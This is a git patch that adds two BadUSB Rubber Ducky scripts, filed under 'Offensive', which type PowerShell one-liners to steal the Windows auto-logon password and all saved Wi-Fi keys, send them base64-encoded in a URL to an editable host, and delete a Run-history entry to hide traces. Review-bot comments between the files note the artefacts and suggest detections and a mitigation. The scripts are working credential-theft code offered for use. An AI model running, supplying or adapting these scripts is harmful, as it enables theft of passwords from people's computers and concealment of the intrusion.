From 81fa732adec683f3a5ad56521d12102dc8d57fde Mon Sep 17 00:00:00 2001
From: Zarcolio
Date: Thu, 27 Jul 2023 16:55:04 +0200
Subject: [PATCH] Add files via upload
---
.../Offensive/Exfill-Default-Pwd-Windows.txt | 29 +++++++++++++++++++
.../Offensive/Exfill-Wifi-Pwd-Win10.txt | 29 +++++++++++++++++++
2 files changed, 58 insertions(+)
create mode 100644 BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt
create mode 100644 BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt
diff --git a/BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt b/BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt
new file mode 100644
index 0000000..6b16c39
--- /dev/null
+++ b/BadUSB/Ducky Scripts/Offensive/Exfill-Default-Pwd-Windows.txt
@@ -0,0 +1,29 @@
+REM _..._ .-'''-. .-'''-.
+REM .-'_..._''. ' _ \ .---. ' _ \
+REM /| .' .' '.\/ /` '. \ | |.--. / /` '. \
+REM || .-. .- / .' . | \ ' | ||__|. | \ '
+REM || \ \ / / .-,.--. . ' | ' | '| |.--.| ' | '
+REM || __ \ \ / / __ | .-. || | \ \ / / | || |\ \ / /
+REM ||/'__ '.\ \ / / .--------. .:--.'. | | | || | `. ` ..' / | || | `. ` ..' /
+REM |:/` '. '\ \ / / |____ | / | \ | | | | |. ' '-...-'` | || | '-...-'`
+REM || | | \ ` / / / `" __ | | | | '- \ '. . | || |
+REM ||\ / ' \ / .' / .'.''| | | | '. `._____.-'/ | ||__|
+REM |/\'..' / / / / /___ / / | |_| | `-.______ / '---'
+REM ' `'-'`|`-' / | |\ \._,\ '/|_| `
+REM '..' |_________| `--' `"
+
+REM Steals HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword
+REM Exfills it via http://127.0.0.1 (edit this)
+REM Cleans up last opened MRU listing ("powershell")
+REM Press button to close MS Edge.
+
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell
+ENTER
+DELAY 2000
+ALTCODE $a=(Get-ItemPropertyValue "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultUserName" -ErrorAction SilentlyContinue);$b=(Get-ItemPropertyValue "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "DefaultPassword" -ErrorAction SilentlyContinue);if($a -and $b -and $b.Trim() -ne ''){$c=[System.Text.Encoding]::Unicode.GetBytes($a);$d=[System.Text.Encoding]::Unicode.GetBytes($b);$e=$c+[System.Text.Encoding]::Unicode.GetBytes(":")+$d;$f=[Convert]::ToBase64String($e);Write-Output "DefaultUsername: $a";Write-Output "DefaultPassword: $b";Start-Process "microsoft-edge:http://127.0.0.1?secret=$f"}else{Write-Output "Default credentials not found in the registry or are empty."};$g=[Microsoft.Win32.Registry]::CurrentUser;$h='Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU';$i=$g.OpenSubKey($h,$true);if($i -ne $null){$j=$i.GetValueNames();if($j.Length -gt 0){$k=$j[$j.Length-1];$i.DeleteValue($k)}};Exit
+ENTER
+WAIT_FOR_BUTTON_PRESS
+ALT F4
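Review bot: The four descriptive REM lines do not record what the ALTCODE one-liner leaves on the host, and a blue team replaying this in a lab needs that to build detections. As written it echoes both values with `Write-Output`, places them base64-encoded (an encoding, not encryption) in a `?secret=` query string over plain `http://`, and deletes whichever name `GetValueNames()` returns last under `RunMRU`, which is not necessarily the `powershell` entry, so an unrelated Run-history item can be lost while `MRUList` may still reference it. I would add `REM Artefacts: credentials shown in console and in the Edge URL, one HKCU RunMRU value deleted`; the same gap exists in Exfill-Wifi-Pwd-Win10.txt. The read itself only returns data where auto-logon keeps `DefaultPassword` in clear text under Winlogon; keeping the auto-logon secret as an LSA secret (for example via Sysinternals Autologon) leaves nothing for this query to return.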
diff --git a/BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt b/BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt
new file mode 100644
index 0000000..97e7d11
--- /dev/null
+++ b/BadUSB/Ducky Scripts/Offensive/Exfill-Wifi-Pwd-Win10.txt
@@ -0,0 +1,29 @@
+REM _..._ .-'''-. .-'''-.
+REM .-'_..._''. ' _ \ .---. ' _ \
+REM /| .' .' '.\/ /` '. \ | |.--. / /` '. \
+REM || .-. .- / .' . | \ ' | ||__|. | \ '
+REM || \ \ / / .-,.--. . ' | ' | '| |.--.| ' | '
+REM || __ \ \ / / __ | .-. || | \ \ / / | || |\ \ / /
+REM ||/'__ '.\ \ / / .--------. .:--.'. | | | || | `. ` ..' / | || | `. ` ..' /
+REM |:/` '. '\ \ / / |____ | / | \ | | | | |. ' '-...-'` | || | '-...-'`
+REM || | | \ ` / / / `" __ | | | | '- \ '. . | || |
+REM ||\ / ' \ / .' / .'.''| | | | '. `._____.-'/ | ||__|
+REM |/\'..' / / / / /___ / / | |_| | `-.______ / '---'
+REM ' `'-'`|`-' / | |\ \._,\ '/|_| `
+REM '..' |_________| `--' `"
+
+REM Steals wifi passwords (uptil win10, win11 needs admin for all passwords)
+REM Exfills it via http://127.0.0.1 (edit this)
+REM Cleans up last opened MRU listing ("powershell")
+REM Press button to close MS Edge.
+
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell
+ENTER
+DELAY 2000
+ALTCODE $base64output=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(((netsh wlan show profiles|Select-String "All User Profile\s+:\s+(.+)$"|ForEach-Object{$_.Matches.Groups[1].Value})|ForEach-Object{ "Wifi: $_`r`n";netsh wlan show profile name=$_ key=clear|Select-String "Key Content\s+:\s+(.+)$"|ForEach-Object{"Password: $($_.Matches.Groups[1].Value)`r`n"}})-join ""));Start-Process "microsoft-edge:http://127.0.0.1?secret=$base64output";$HKCU = [Microsoft.Win32.Registry]::CurrentUser; $RunMRU = 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'; $RunMRUKey = $HKCU.OpenSubKey($RunMRU, $true); if ($RunMRUKey -ne $null) { $values = $RunMRUKey.GetValueNames(); if ($values.Length -gt 0) { $lastValue = $values[$values.Length - 1]; $RunMRUKey.DeleteValue($lastValue)}};Exit
+ENTER
+WAIT_FOR_BUTTON_PRESS
+ALT F4
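Review bot: The header comment does not say that every saved profile key ends up in a single `?secret=` URL, which means the full set is likely to remain in the signed-in user's Edge history after the window is closed with ALT F4. I would state that in the header, e.g. `REM Artefacts: all Wi-Fi keys base64-encoded in one Edge URL; one netsh call per profile`. For detection, each profile produces its own `netsh wlan show profile name=… key=clear` process under the PowerShell session, which process command-line auditing (Security event 4688 or Sysmon event 1) records, and it is presumably preceded by a Run-dialog launch of `powershell` from a newly attached keyboard device.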